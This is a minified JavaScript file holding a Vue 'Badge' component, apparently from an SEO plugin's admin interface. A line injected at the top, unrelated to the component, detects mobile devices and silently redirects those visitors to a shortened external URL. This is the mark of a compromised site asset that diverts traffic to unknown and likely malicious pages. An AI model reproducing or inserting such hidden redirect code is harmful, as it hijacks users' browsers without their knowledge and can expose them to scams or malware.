(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as t}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as e,i as o,U as r,P as a}from"./vendor-vue-ui.232c7c36.js";const s={__name:"Badge",props:{color:{type:String,default:"black",description:"Badge color(green|red|orange|black|blue)"},text:{type:[String,Number],default:"",description:"Badge text"}},setup(n){return(c,l)=>(e(),o("span",{class:a(["aioseo-badge round",n.color])},r(n.text),3))}},p=t(s,[["__scopeId","data-v-bc6fd085"]]);export{p as B};
